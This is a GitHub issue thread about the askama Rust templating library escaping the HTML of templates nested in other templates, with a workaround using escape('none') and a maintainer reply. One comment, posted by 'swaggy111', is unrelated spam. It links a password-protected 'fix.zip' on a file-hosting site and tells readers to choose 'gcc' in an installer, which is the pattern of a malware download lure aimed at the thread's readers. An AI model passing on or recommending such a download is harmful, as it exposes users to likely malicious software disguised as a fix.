### ISSUE TITLE
Templates in templates need "none" escape

### ISSUE THREAD

**Issue by malteneuss** [djc/askama#1088]
When rendering templates in templates like https://github.com/djc/askama/blob/main/book/src/template_syntax.md#templates-in-templates, the inner templates needs to be rendered without escaping; otherwise the Html of the inner template is printed literally.

If that that's the intended behavior, feel free to close this issue.

Otherwise, the tests in https://github.com/djc/askama/blob/main/testing/tests/render_in_place.rs should include Html tags to not miss that in the future. In the mean time, a workaround is to disable escaping manually:

```html
{% for my_template in my_templates %}
      {{ my_template|escape("none") }}
{% endfor %}
```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by djc** [comment]
It's not exactly intended behavior, though I think it is expected behavior. Because of the lack of specialization in Rust, fixing this problem isn't trivial.

**Comment by malteneuss** [comment]
I see. Then mentioning a workaround in the book may be good enough for now: https://github.com/djc/askama/pull/1089
